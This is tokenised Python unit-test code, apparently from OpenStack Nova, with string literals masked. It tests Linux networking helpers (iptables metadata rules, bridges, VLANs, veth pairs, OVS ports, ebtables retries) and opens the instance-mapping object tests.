'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_initialize_gateway_resets_route ( self ) : <EOL> routes = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected , routes ) <EOL> def test_initialize_gateway_no_move_right_ip ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_initialize_gateway_add_if_blank ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_ensure_floating_no_duplicate_forwards ( self ) : <EOL> ln = linux_net <EOL> self . stubs . Set ( ln . iptables_manager , '<STR_LIT>' , lambda : None ) <EOL> self . stubs . Set ( ln , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> net = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ln . ensure_floating_forward ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , net ) <EOL> ln . ensure_floating_forward ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , net ) <EOL> two_forward_rules = len ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] . rules ) <EOL> ln . ensure_floating_forward ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , net ) <EOL> dup_forward_rules = len ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] . rules ) <EOL> self . assertEqual ( two_forward_rules , dup_forward_rules ) <EOL> def test_apply_ran ( self ) : <EOL> manager = linux_net . IptablesManager ( ) <EOL> manager . iptables_apply_deferred = False <EOL> self . mox . StubOutWithMock ( manager , '<STR_LIT>' ) <EOL> manager . _apply ( ) <EOL> self . mox . ReplayAll ( ) <EOL> empty_ret = manager . apply ( ) <EOL> self . assertIsNone ( empty_ret ) <EOL> def test_apply_not_run ( self ) : <EOL> manager = linux_net . IptablesManager ( ) <EOL> manager . iptables_apply_deferred = True <EOL> self . mox . StubOutWithMock ( manager , '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> manager . apply ( ) <EOL> def test_deferred_unset_apply_ran ( self ) : <EOL> manager = linux_net . IptablesManager ( ) <EOL> manager . iptables_apply_deferred = True <EOL> self . mox . StubOutWithMock ( manager , '<STR_LIT>' ) <EOL> manager . _apply ( ) <EOL> self . mox . ReplayAll ( ) <EOL> manager . defer_apply_off ( ) <EOL> self . assertFalse ( manager . iptables_apply_deferred ) <EOL> def _test_add_metadata_accept_rule ( self , expected ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> linux_net . metadata_accept ( ) <EOL> def _test_add_metadata_accept_ipv6_rule ( self , expected ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv6 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> linux_net . metadata_accept ( ) <EOL> def test_metadata_accept ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_rule ( expected ) <EOL> def test_metadata_accept_ipv6 ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_ipv6_rule ( expected ) <EOL> def test_metadata_accept_localhost ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT:127.0.0.1>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_rule ( expected ) <EOL> def test_metadata_accept_ipv6_localhost ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_ipv6_rule ( expected ) <EOL> def _test_add_metadata_forward_rule ( self , expected ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> linux_net . metadata_forward ( ) <EOL> def test_metadata_forward ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_forward_rule ( expected ) <EOL> def test_metadata_forward_localhost ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT:127.0.0.1>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_forward_rule ( expected ) <EOL> def test_ensure_bridge_brings_up_interface ( self ) : <EOL> self . flags ( fake_network = False ) <EOL> fake_mac = '<STR_LIT>' <EOL> fake_ifaces = { <EOL> netifaces . AF_LINK : [ { '<STR_LIT>' : fake_mac } ] <EOL> } <EOL> calls = { <EOL> '<STR_LIT>' : [ mock . call ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = False ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , fake_mac , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = False ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> } <EOL> with test . nested ( <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = True ) , <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> mock . patch . object ( netifaces , '<STR_LIT>' ) <EOL> ) as ( device_exists , _execute , ifaddresses ) : <EOL> ifaddresses . return_value = fake_ifaces <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> driver . ensure_bridge ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> device_exists . assert_has_calls ( calls [ '<STR_LIT>' ] ) <EOL> _execute . assert_has_calls ( calls [ '<STR_LIT>' ] ) <EOL> ifaddresses . assert_called_once_with ( '<STR_LIT>' ) <EOL> def test_ensure_bridge_brclt_addif_exception ( self ) : <EOL> def fake_execute ( * cmd , ** kwargs ) : <EOL> if ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == cmd : <EOL> return ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> return ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with test . nested ( <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = True ) , <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , fake_execute ) <EOL> ) as ( device_exists , _ ) : <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> self . assertRaises ( exception . NovaException , <EOL> driver . ensure_bridge , '<STR_LIT>' , '<STR_LIT>' ) <EOL> device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> def test_ensure_bridge_brclt_addbr_neutron_race ( self ) : <EOL> def fake_execute ( * cmd , ** kwargs ) : <EOL> if ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == cmd : <EOL> return ( '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with test . nested ( <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = False ) , <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , fake_execute ) <EOL> ) as ( device_exists , _ ) : <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> driver . ensure_bridge ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> def test_set_device_mtu_configured ( self ) : <EOL> self . flags ( network_device_mtu = <NUM_LIT> ) <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) <EOL> ] <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . _set_device_mtu ( '<STR_LIT>' ) <EOL> ex . assert_has_calls ( calls ) <EOL> def test_set_device_mtu_default ( self ) : <EOL> calls = [ ] <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . _set_device_mtu ( '<STR_LIT>' ) <EOL> ex . assert_has_calls ( calls ) <EOL> def _ovs_vif_port ( self , calls , interface_type = None ) : <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . create_ovs_vif_port ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> interface_type = interface_type ) <EOL> ex . assert_has_calls ( calls ) <EOL> def test_ovs_vif_port_cmd ( self ) : <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> cmd = linux_net . _create_ovs_vif_cmd ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( expected , cmd ) <EOL> expected += [ '<STR_LIT>' ] <EOL> cmd = linux_net . _create_ovs_vif_cmd ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( expected , cmd ) <EOL> def test_ovs_vif_port ( self ) : <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> ] <EOL> self . _ovs_vif_port ( calls ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> def test_ovs_vif_port_with_type_vhostuser ( self , mock_set_device_mtu , <EOL> mock_create_cmd , mock_vsctl ) : <EOL> linux_net . create_ovs_vif_port ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , mtu = <NUM_LIT> , <EOL> interface_type = network_model . OVS_VHOSTUSER_INTERFACE_TYPE ) <EOL> mock_create_cmd . assert_called_once_with ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , network_model . OVS_VHOSTUSER_INTERFACE_TYPE ) <EOL> self . assertFalse ( mock_set_device_mtu . called ) <EOL> self . assertTrue ( mock_vsctl . called ) <EOL> def test_ovs_vif_port_with_mtu ( self ) : <EOL> self . flags ( network_device_mtu = <NUM_LIT> ) <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) <EOL> ] <EOL> self . _ovs_vif_port ( calls ) <EOL> def _create_veth_pair ( self , calls ) : <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . _create_veth_pair ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ex . assert_has_calls ( calls ) <EOL> def test_create_veth_pair ( self ) : <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> ] <EOL> self . _create_veth_pair ( calls ) <EOL> def test_create_veth_pair_with_mtu ( self ) : <EOL> self . flags ( network_device_mtu = <NUM_LIT> ) <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) <EOL> ] <EOL> self . _create_veth_pair ( calls ) <EOL> def test_exec_ebtables_success ( self ) : <EOL> executes = [ ] <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . driver . _exec_ebtables ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> def _ebtables_race_stderr ( self ) : <EOL> return ( u"<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_exec_ebtables_fail_all ( self ) : <EOL> executes = [ ] <EOL> def fake_sleep ( interval ) : <EOL> pass <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT:error>' , <EOL> stderr = self . _ebtables_race_stderr ( ) ) <EOL> self . stubs . Set ( time , '<STR_LIT>' , fake_sleep ) <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> self . driver . _exec_ebtables , '<STR_LIT>' ) <EOL> max_calls = CONF . ebtables_exec_attempts <EOL> self . assertEqual ( max_calls , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> def test_exec_ebtables_fail_no_retry ( self ) : <EOL> executes = [ ] <EOL> def fake_sleep ( interval ) : <EOL> pass <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT:error>' , <EOL> stderr = "<STR_LIT>" ) <EOL> self . stubs . Set ( time , '<STR_LIT>' , fake_sleep ) <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> self . driver . _exec_ebtables , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> def test_exec_ebtables_fail_once ( self ) : <EOL> executes = [ ] <EOL> def fake_sleep ( interval ) : <EOL> pass <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> if len ( executes ) == <NUM_LIT:1> : <EOL> raise processutils . ProcessExecutionError ( '<STR_LIT:error>' , <EOL> stderr = self . _ebtables_race_stderr ( ) ) <EOL> else : <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( time , '<STR_LIT>' , fake_sleep ) <EOL> self . stubs . Set ( self . driver , '<STR_LIT>' , fake_execute ) <EOL> self . driver . _exec_ebtables ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( executes ) ) <EOL> self . mox . UnsetStubs ( ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = True ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_remove_bridge ( self , mock_execute , mock_exists ) : <EOL> linux_net . LinuxBridgeInterfaceDriver . remove_bridge ( '<STR_LIT>' ) <EOL> expected_exists_args = mock . call ( '<STR_LIT>' ) <EOL> expected_execute_args = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , run_as_root = True ) ] <EOL> self . assertIn ( expected_exists_args , mock_exists . mock_calls ) <EOL> self . assertEqual ( expected_execute_args , mock_execute . mock_calls ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' , return_value = False ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> def test_ensure_vlan ( self , mock_set_device_mtu , mock_device_exists , <EOL> mock_execute ) : <EOL> interface = linux_net . LinuxBridgeInterfaceDriver . ensure_vlan ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , interface ) <EOL> mock_device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> expected_execute_args = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:id>' , <NUM_LIT:1> , check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , '<STR_LIT>' , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] , run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] , run_as_root = True ) ] <EOL> self . assertEqual ( expected_execute_args , mock_execute . mock_calls ) <EOL> mock_set_device_mtu . assert_called_once_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' , return_value = True ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> def test_ensure_vlan_device_exists ( self , mock_set_device_mtu , <EOL> mock_device_exists , mock_execute ) : <EOL> interface = linux_net . LinuxBridgeInterfaceDriver . ensure_vlan ( <NUM_LIT:1> , '<STR_LIT>' ) <EOL> self . assertEqual ( "<STR_LIT>" , interface ) <EOL> mock_device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertFalse ( mock_execute . called ) <EOL> mock_set_device_mtu . assert_called_once_with ( '<STR_LIT>' , None ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = True ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = processutils . ProcessExecutionError ( ) ) <EOL> def test_remove_bridge_negative ( self , mock_execute , mock_exists ) : <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> linux_net . LinuxBridgeInterfaceDriver . remove_bridge , <EOL> '<STR_LIT>' ) </s>
<s> import mock <EOL> from oslo_utils import uuidutils <EOL> from nova import objects <EOL> from nova . objects import instance_mapping <EOL> from nova . tests . unit . objects import test_cell_mapping <EOL> from nova . tests . unit . objects import test_objects <EOL> def get_db_mapping ( ** updates ) : <EOL> db_mapping = { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : uuidutils . generate_uuid ( ) , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> db_mapping [ "<STR_LIT>" ] = test_cell_mapping . get_db_mapping ( id = <NUM_LIT> ) <EOL> db_mapping [ '<STR_LIT>' ] = db_mapping [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] <EOL> db_mapping . update ( updates ) <EOL> return db_mapping <EOL> class _TestInstanceMappingObject ( object ) : <EOL> def _check_cell_map_value ( self , db_val , cell_obj ) : <EOL> self . assertEqual ( db_val , cell_obj . id ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , <EOL> '<STR_LIT>' ) <EOL> def test_get_by_instance_uuid ( self , uuid_from_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> uuid_from_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( ) . get_by_instance_uuid ( <EOL> self . context , db_mapping [ '<STR_LIT>' ] ) 